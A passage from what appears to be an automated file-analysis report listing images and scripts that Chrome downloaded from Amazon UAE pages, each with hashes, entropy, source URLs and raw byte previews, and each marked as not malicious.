                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1"A2Q..aq.#B......RS...34CTcrst.......$5Dbd...%....................................................!.1.."Qa2A.#B...q...3..............?..t...v.i..AN.......lW..-r.s:..'?.....k........&Q.{rb.F@.n<...k.....29._......v..}..G......^..'Y`F..kh...?..X...k...Oe..H?...'_@#[.%..?x.o."Y...Y.B..;37..$.s.$....r........... .u.#.......N...-d*..{..hs6@.J\......[ 4..]3../..q[E..X.I(..Y...2+...Z.....$.![..&Y4..`G~{....?......5.P.`j.\.{....E.1p@<..:....#8.@...D|.|.z..7.-l...C2......{.,....-..U...l.Z*...'.}f..rTq.........4a...6..5.e..<o....]...2w....q..pE..)@[.b.....&ehr..r....c...+...Z.W.M.F}R....NVU.Z........F...".=G....2.......a.\....f.r......V...5V..~.....oV...&.".....y...*?{.N.........'_q:..&...O...G.eG.u...'..G.d........V....A.....Q..?.5.jY(+.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x314, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23362
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9656305573199955
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:dXoUtZMUEzJyxQd3GaVitBhJt/M1TMKItaUla/x5z/4NW4:WUtZpEzeQd3VitBhJt/5KItHGWL
                                                                                                                                                                                                                                                                      MD5:01741576711DC683B535078378756C15
                                                                                                                                                                                                                                                                      SHA1:919FBF75804195D6AA747AC71EBE4C04B7B447B2
                                                                                                                                                                                                                                                                      SHA-256:20008598B5823541052DFA5BC070E9A887D3F160495992CDE5D4347E6DFD2CE4
                                                                                                                                                                                                                                                                      SHA-512:0A8059C578469FFBD4D4FF9873132020DFA64E606B23BE14BFD0B1FD421155EECDB696BE9DA49EC7FEBE42A140504DEB0B777795D3B34AABA697A4F2C112C2B3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71XtvleNvPL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......:.@.."..........6...................................................................|....d0g......@.4...P.=y..{N..jZ.F.)..O....l.I..h.-x{.=....BP.p......"..2.3.......}.V...........y(.f.Z~V.=..cs,j.S..>#.J..]...fQ.EJ............M.gq.....g.|}c-...2.... V.}u_..V......q..\..pE..{......!u..~...=}g..Z?.u..5.k....?G. ..u....)[L......K....`......f..y.../.x..).....X..4P Q|..g.<..ky..5(..V...)x.M;U...t..keR..hb<.ua..:s......:.mf.|n0..}.....g.g....U...}..rWG....+.5.S..}....L...559..=..!.i5....v...h..{.5..N=L.n......t.....{..3....>s,Q..V.A..a.F...b..U.jH$.F./O...(....9.]..Ft7%wIu._.Z....a.t.O....4........V.v....r.V....O...E......~e.|.VS.+.J...hS.....p...._...U#cB..V...9..o..$..f...j.T.h.....G......Q. QO.....y..:.`...fi.j.VsS..z...RS5/\R.u.].......[..W..........#%...6.ci.iPrY...,..8...[i.u}....U9
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4816
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9131332185751475
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:JBzv1Lr0xgoQC5k5pCNa+E7MTRc3drxQFNrIIQ1YHrR:TNLAxDG5cNapw2trOrEER
                                                                                                                                                                                                                                                                      MD5:6E59EDC6DEEDB38F497622893AB541C8
                                                                                                                                                                                                                                                                      SHA1:1BDEE947D4927635FE9B52B9F31E026C2ADA0B19
                                                                                                                                                                                                                                                                      SHA-256:2991825E35819E2768DCFB7861227EE717365369F52C07D06B96994D0CD533FE
                                                                                                                                                                                                                                                                      SHA-512:D632915EBD23D699773A3A38B6FCE6C20A16E502036C89CC3C7F29BF6522DDBDF84757037E25316161556447112B155F5BB505D62DF1F1978AF6329A36887940
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE._SY116_CB569183660_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................%... ..#.%.%$$&)*%.)8...........#...$...+$*.$&$$./$*#$.%$. .....$.&&%..&#.2...$#) .&-......t...."...............................................................!1..AQ."Ra....2qr.$36Bs....#b...%S...................................................1..!.34ABaq....."2Qr.RS..............?...E..+.E.QX'.B..I...[$y..J.*/6...N..W....h.o.J......F@."~..N.|...r....O.4.g6.......?.c.|..?.XZE.Ri2H......N.....]B)..F..c\L..;.j.....w..CWN&......T.......j.n..$..?...lpD.5.K.l.%l.`.G..+...z..#*.h...........c.c^*}:..(.|{.".q.6....m..~Z>.[{o._...~$....F..1.8Q.6..i.H.y.N..<.,{@.*.f'.....S...3...[.e..=.*w.......k..m.....W.....K...s>.r:...6..A.......2|9.>..MM.Y.4t.E....y.n.......U_Vm.....I..m..~Z..f...F.H..JQXers.u>.,Z..w.B."]..(U.N:..[a...Pnnt.SU....wh!....J}Y....-..-.....W..o....n......P......D`.B..\2...h.lq....F...D5QM##...>.VG....>+.."...Yc.v;...8.r..E.I..,..5..~...2......WL..r.&.A.r..ki%....w`..$.t\..U.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9763
                                                                                                                                                                                                                                                                      Entropy (8bit):5.5576256209320105
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:6U7KggJdFc65eODBRWPWVJfZZ4CD7N1bNa+AqDWzEF7jTwT8U:6U7Knz5eiBRhVjvriYlU
                                                                                                                                                                                                                                                                      MD5:6EED3151A81957F00C3AA5AD97F78CAB
                                                                                                                                                                                                                                                                      SHA1:6C0E9AD0ACB70ECB40B78B05CC7273D5FF882C97
                                                                                                                                                                                                                                                                      SHA-256:8A1CA9608771693D06B0109E1E442D495DA603F32182A6527F9F1026C84780E9
                                                                                                                                                                                                                                                                      SHA-512:92462B00575FE2B761D3159F7ACE5D5FF4C56B71228925B187FEF8E164D5F8C4354215AC2BEF26F0532AA162257AEF285C8EEB902F4EFF187FD9DA8FCCBBE98A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.js
                                                                                                                                                                                                                                                                      Preview:(function(c,m){function y(a){if(a)return a.replace(/^\s+|\s+$/g,"")}function x(a,g){if(!a)return{};var b="INFO"===g.logLevel;a.m&&a.m.message&&(a=a.m);var f=g.m||g.message||"";f=a.m&&a.m.message?f+a.m.message:a.m&&a.m.target&&a.m.target.tagName?f+("Error handler invoked by "+a.m.target.tagName+" tag"):a.m?f+a.m:a.message?f+a.message:f+"Unknown error";f={m:f,name:a.name,type:a.type,csm:N+" "+(a.fromOnError?"onerror":"ueLogError")};var h,l=0;f.logLevel=g.logLevel||A;g.adb&&(f.adb=g.adb);if(h=g.attribution)f.attribution=.""+h;if(!b){f.pageURL=g.pageURL||""+(window.location?window.location.href:"")||"missing";f.f=a.f||a.sourceURL||a.fileName||a.filename||a.m&&a.m.target&&a.m.target.src;f.l=a.l||a.line||a.lineno||a.lineNumber;f.c=a.c?""+a.c:a.c;f.s=[];f.t=c.ue.d();if((b=a.stack||(a.err?a.err.stack:""))&&b.split)for(f.csm+=" stack",h=b.split("\n");l<h.length&&f.s.length<F;)(b=h[l++])&&f.s.push(y(b));else{f.csm+=" callee";var m=z(a.args||arguments,"callee");for(h=l=0;m&&l<F;){var v=G;m.skipTr
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):32669
                                                                                                                                                                                                                                                                      Entropy (8bit):7.96908499442983
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1FB6bRfXJ1uWTUGbKccpzFYvpwBHlrQ8YlusE2zoctrCEzYVq:l6bVXLDT9nSF+nlvJoctrCEx
                                                                                                                                                                                                                                                                      MD5:B84FCDE85FE73D9CC5DF02D9DD15E0AC
                                                                                                                                                                                                                                                                      SHA1:4310A8FFE0F4E6882FE1292EBFCCD9F6341AF413
                                                                                                                                                                                                                                                                      SHA-256:7F6DAB5B2F7F984EFE4DC95A1186DF30778FB6CA9C66277FEC90E97A8DC3E113
                                                                                                                                                                                                                                                                      SHA-512:DBA5653EC914C7B89221469E1A2DBAA4EACA9D2A03551BC8AB642273D070C5770C4BA49FB7DD2DE667992D99471D531BB3ACCE0535F90903D881077BE6913B8E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/coop/nordicdots_spartan_banner.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."..................................................ng.Z.(......-rZ../..x.=Y5Tp..y'.=7T.................Y'..LxC..#.5V..l.xq.....?...e:v.............1...f.+.]...J.~.....:.gp/$,.H.i.p...u@..............5KD..f.@8}>.qh.s....my.Fu.J.7.-~7..z...H.....EP/..2.*..f......bd.[.4...U......c~8.....K..QNd..h(....;P.2(..x.4..9q.h.Y.]...c.L./......77...SsH..*.s..&.4.l9.SR6....w.....#O.@8...g..=..y..9)B.NJ*v..n.P....b.=.E^..W..G).gv.=}..iu...6.4a.._lp.G....~...p..q.....P....bd/'..<.2.p.;....]T.$.%l.AU..,$A...j:....`.'...................K9.L>..m~.`.....De..>.........j@....(".U.....k1.%...O5&"...{/g.....h....Q..R..7y.T.$...[Z...+......-SQ.".@..e.FK....A%.v.J../.>.\........^.u...p.>.....w..W.......["...x................JQa...n.^..|:8moyU_.t.PM..;p..=S..t...............H.].![.....<.t.C......u........,.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5284
                                                                                                                                                                                                                                                                      Entropy (8bit):7.902264827854326
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Ty3OJCJ15DrPU2Wz+OT5higqkEve6OnsSjV3AZH/:EOJCfaf+OT56d2VAB
                                                                                                                                                                                                                                                                      MD5:E322DC61003BBE309B369CC924707F76
                                                                                                                                                                                                                                                                      SHA1:B3B8ECD8F9391259962936F6F99C12FD86631DE7
                                                                                                                                                                                                                                                                      SHA-256:2E49F3D78EB605F0E6FCB03EDFD74BACC3527F8A5B9887FBECD8251710FF963A
                                                                                                                                                                                                                                                                      SHA-512:9520AC8885A046AAB4CB5BED9C8AFB6D52D996CFFA7A298641C573EB5B7E922A13A92DC413C6F1F90A1380248FD1F8CF003E75286CEFC616996E80645070453C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61cf02Xv2PL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................1..!a."AQ...#2Bq..3Sb...RTc....$s..%r....................................................?..t.(..(..(..( ..w%..C.....(.F(Y.n..H .6I.....t..+...Z.q........c3rn.U..._..1..t..w ...I+..I...~l..&nN.t.H...2.{;.B..g)!.r..C0..{(H.A3.].{.s... .dF...B.2..T...f........@f.@"K.'.L.@9'{l.I..#.....XgI.<l.N|G.....G..JR.JR.JR.JR.JR.JR.JR.JR.JR.\k......u...~*...{..........h*.gWV.....J#...+H.....2...Q...S......D.h-D.^Gc....2.'2=\._.,.....vw..1^s.C..!1.]A.%.sM/h...V.i...M*..,<.9.,C.$fv..0z~.c./z..%.5..>....V..=...bN.;....5m*...RtkK..G.n.k6U...#.9......x.9V.L.....O....&(..#.....h......~..<i..n.^..N.0Y.C$.I.o....bY:.+..b2.."....)U.R..R..>....w..T8&7........4..R..R..R..R..R..R...n..J.g...d...l../........./.\.......c...;.U..r~L+..y...:...Q..+......>AP.9U..1^^.]..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3486
                                                                                                                                                                                                                                                                      Entropy (8bit):7.643857105503464
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TbVFSlefm7OHHTA8W3h/7Be1T+HRjr+7bbC13eA:tFUeu78HVW3ze1cRurpA
                                                                                                                                                                                                                                                                      MD5:8751895E930BB8E97813F18C2D7F4B15
                                                                                                                                                                                                                                                                      SHA1:2423AF95CD0CB2155E8F05FD775397BF0F48B035
                                                                                                                                                                                                                                                                      SHA-256:8EE1ACEB3E63974C278D061E28C152BA7FCC03C888571C30E5F7125CBC6E889D
                                                                                                                                                                                                                                                                      SHA-512:9DC2058A61D5D4B9AE417EDAFC8ADC8E7DD81D0170CF632F88D4663645320EE6010CA32DA8B496E70AD06D531D9BDB839F6D9059644EE6618F21ACF9E7322C1D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`....................................o..N..S....%:,.N..S....%:,v.|......G.h..d.*Y....3.X..>.x}:.p....i......c..E..i.5^..z.}....@...CO.4........>.b..~.i.6._-..u...8...ZE.Lx..yp..L..s........i.........E...[.....9...&N.'m.....M....l.+z5....O...yW$......C..}..,2>....W.h\p..N..)...O.]...+-..r...;7..h......zT.o.....+.]'...V.>......Z..}...l.L]LK...{.^M...M..#.t.o.8..1.....1zQ.xD..u..*J6....^.(h.....1a&j...m.._rT.6w...dS...k~..............................................?...,............................04. 1..!A2p35Q............i..Y.oj.\..5sF.h.....V.j.\..5sF.h.....W4Y..v.*..o6..5.Y{F..%%..JML.X.%..\.e../`.0`Y0L.6.#F...aH_.D....d.B..k.............D..g.R./vP....$..|...t#.r....7.^/zP..L...hE..+.x...r.0MC..~.=...>.....[1..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x70, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7969
                                                                                                                                                                                                                                                                      Entropy (8bit):7.794053054446247
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ngzUMWvEQ0UAEqrrRD1T66qUoTQ0Dtlu2FyyI8QPMNwZ/br/N07L:gzFUAtnRDOQ0Dtkn8QnZn6v
                                                                                                                                                                                                                                                                      MD5:C313C83F8C90A364EC00968D60FD7A1C
                                                                                                                                                                                                                                                                      SHA1:C0D9D0855C2FE678D9EB67DACE249D77B611B001
                                                                                                                                                                                                                                                                      SHA-256:B9F32CF9AFF6033F1EDD36FF810A4AD6F4B404B1CCF16E6271632D742D600F5F
                                                                                                                                                                                                                                                                      SHA-512:2AB269272F1B6AEA27B7805357FDB7EC3F44CF28BA87FE85F0FC7F174B102E1953A55AC52FCE4232B6FB166D5D8F21DC82F90028FC6743EEFC13BDFB47EA22F5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......F....".......................................M........................!..1AQ."aq2.......#56Brs...3S..$&Rb.....CETct...................................$....................!..1aAq."Q................?..4...:.O..8.-bXl.#.6..Qs.+....H....[.....^6.....6H.Y.....O.....[..pG.[k.Y@..."~g.1@:.R.<#........"......@..B.....J..g.`.3M......?.(.2Z....'..&.....~...Z.3V.>....e.].2...%"}..E).C..b........QF(R.(.T)J.Q*j..E..JP..5s.).Z..!.*...(..R..J.)B.*...(..R..T)J..P.(QD.R.(..JP..P.(QD.R.(..JP.J.)B.%B..@..R..J.)B.*.....R.(..JP.J.)B.%B..@..R..T)J.Q*...(..R..J.)B.*.....R.(.T)J.Q*.....R.(.T)J.Q*.....R.(..JP..P.(P%B..E..JP..P.(QD.R.(..JP..P.(P%B..@..R..T)J..P.(QD.R.(.T)J.Q*...(..R..J.)B.*...(..R..J.)B.%B..@..R..J.)B.*...(..R..J.)B.%B..@..R..T)J.Q*.....R.(.T)J.Q*.....R.(..JP..P.(P%B..@..R..J.)B.%M.MP..P..i.Z%B..E..JS.Q....D.R.E..JP..P.).
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 165x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10670
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967452360122912
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:wTj+3QA3wnNfKS2a1F63GEmoQQEw/4n0W3JpzQ2xiNPLQiFO0hVn/TJAqPH:A+3zcCS2aYmoQQEwwzJNYJQfyVA4
                                                                                                                                                                                                                                                                      MD5:17F2BBD6798E35F79DDA2F0EE3F7EB8B
                                                                                                                                                                                                                                                                      SHA1:E15D08872720BC93A7790BD177FAB22E67BC77A0
                                                                                                                                                                                                                                                                      SHA-256:D7E6B519E9FBFEA68CD6A247EB2D55D4EC057ED9C941B5490D5B9B3C0C61E99E
                                                                                                                                                                                                                                                                      SHA-512:5036DE5E86559BF40A8185F16D2712E0BAA93D5AF78072FD9E93DAB305A38FB847B99E44D57F52FFB995194BCC7F6D9E8801C36BC162FD3BA9B4E95853B1EAE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.aq.#2B....CDRT.........$34Sbcrtu....6Us...%5dE..................................................1..R..!AQ...#2q..a.3..."...............?.(.....&...UH..r.tb?@...7..}..][...D..1.".gw.>..3...Da(u......SOWQ5|.`\..Hb).(..X.........Xw..{....R.qo..~.8.]...|...<g..A=Q.kB.$*...G....A.ho.8..3.2.*......6.S......K.9...2....E}.9..........v.....h.... gU.>.......>?.Z...<]3X*i.vE..W...... ..QH...U..41.......Q..N.<.u(.kr.x.=......o..x.>6.6....O.r,H".x... .."..Gn..]...qqYb....Z.M....8.T.3Z..Et..c..S(..}..fA.=..XQ.X.}...P..i.}q...0...]p...../.5.$+Y}>}..1....?...=...PT.........O.<h..|.hq.L.3.s..P.znEh...re.V@.....p..!...x....O....!.[8.....#....Mf.-..'W03G.H....J.3.pw=.z.~~.`...[.].7...M.tlY.=.<[E.$.......F..W....8...7...Bf._.Zi.DO.\.8[....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x234, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):33466
                                                                                                                                                                                                                                                                      Entropy (8bit):7.978468550605761
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:zGZCrp/tf8peA4HdUv8zQRJNZNifCkk3IADyJ/VIWq:zGQp/tf8p39v8y5NiftSI9xq
                                                                                                                                                                                                                                                                      MD5:9B43798BAB6ED503829751E631B03FA7
                                                                                                                                                                                                                                                                      SHA1:6F5BE9F02C314A4944D6B1345621DEA093F3F8BF
                                                                                                                                                                                                                                                                      SHA-256:6BE1A607EBCDED0281B7FBA6124E3A8F987048C55DAEE3C82EFD6408573F0345
                                                                                                                                                                                                                                                                      SHA-512:ABA0D49B09D768315897BD729F59B07695246DF59B81C6D316FB9B9263ECE235285D5715E2F4643487F1535104BD680DF3CE3DDA298E1251A41DD707025CA4C0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/store/ATF-OHL-AmazonBasics-Desktop_Sports.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666..........."........................................M.........................!.1AQ."aq...2BR...#34r....CSbs...$5Tc..D..%&U..'7.......................................................!..1AQ.aq"...2R..B................?...Kr...X..Q.$.E...E.[..@\.@)nQr......@].E..5F..r...\.J..P........F.n.P&........O.x.......W.l......}..].2./....9..M...5C.-....[..,.........u..g6>...l.K.-..!....u..n.J.uK.D.T..E...P9..J.uJ..T..T.D(J.*......#..v....?.S./.I.;....*...w.+.ld......`......sk].u........G.=..m...#.S...#...T..2..hUf.@?N1.XN...Z.`j:)*"w..OC..&d..2..)C.$...@..F.....T4.s.V..&..$$..J.A.s.)AN.......Kt..H.;Q......$....G......i.[<$..i=..S.y7Au.........A|m.A.6I.DM..OxCR[.\%.M9 [.\#A..r@...Cy.n.%..1........n.s.m...o..&..;.7.B...A.....m..`H4...|..Y.....!..!.F....{.5W..Po.[m'.L........{....!..!..!...g.'.......5.T..o.R.....>.r...m%H.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13784
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911497864319653
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:5jxd2acFO+8tcEnWcumLx1Vu1ZOj6nI7k:df2AtpxXXm06nIw
                                                                                                                                                                                                                                                                      MD5:94502476E8FD16C7E39765761AB4FF97
                                                                                                                                                                                                                                                                      SHA1:067C02240D92A95D6093A0CEA4D5F569C1553934
                                                                                                                                                                                                                                                                      SHA-256:DB3AE2FB412A84AB6D4837F2ACD72DC143B04BBFCE9A84AC22E242D2F3A908A7
                                                                                                                                                                                                                                                                      SHA-512:98ED84994F518CA01B78CE40F9777A3DF20F4D08EF47543A747EAFC6FAE90E173059340F2BE5AB16764A8D38A26791C270EC395591468466FCD1436588A54FC0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY304_CB567277961_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........5....................................................................@................................................y.*..G>......<..A.n....~.(.B"y.....9.....9...._Q[.I.I.......]...nW....p*...;r.O.a......5..;.6.~.4r..7.{.W.......-.....S........j+.)!............m.U.x.W%...#.c3.`...72.."~.[X.$...Lo..8..o.........b...p3.q.En.W.RC.w.......u#ws*.....x.eG.....w&.....g...A}.^&9R....f....$.n.U.eF^.DN.Y..i.......2.....H{n........n.e[r...7..s..1...K....-......M...T.C..K]$J....b.`.2.8-..F<nY.K_'.^.I.k.......MaMX.J..~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.!~.P...............h......D.,...c0z......g8.....1....5....L...L.S\.}..(..........P[...\B_....6....6a_......Qx...H.:....C..eFd..X.1;..W..4...*.B.................^. ./.>..,z...a.n....{....D.u{M| .=.|.;!..X....{j.....D.i.....W..}..(..........P[
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):65568
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972734414417205
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                                                                                      MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                                                                                      SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                                                                                      SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                                                                                      SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (16775), with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16775
                                                                                                                                                                                                                                                                      Entropy (8bit):5.4319461542356375
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:75e8vl7Dm2yfRRt2XHyfO7NGSulG8QKf1OqJA3oq3Ov07r:75e8v1DSoXpGmqJA3oq3Ov07r
                                                                                                                                                                                                                                                                      MD5:909387735CDFE104DDCB4552DB93B969
                                                                                                                                                                                                                                                                      SHA1:9E9B4D86B6122C3E2B8DE8B6A2075B165DBB7682
                                                                                                                                                                                                                                                                      SHA-256:DA1947B36F0D22AEE59588CBAC8F06A015218EE7DDF6706618BE10F2A1151211
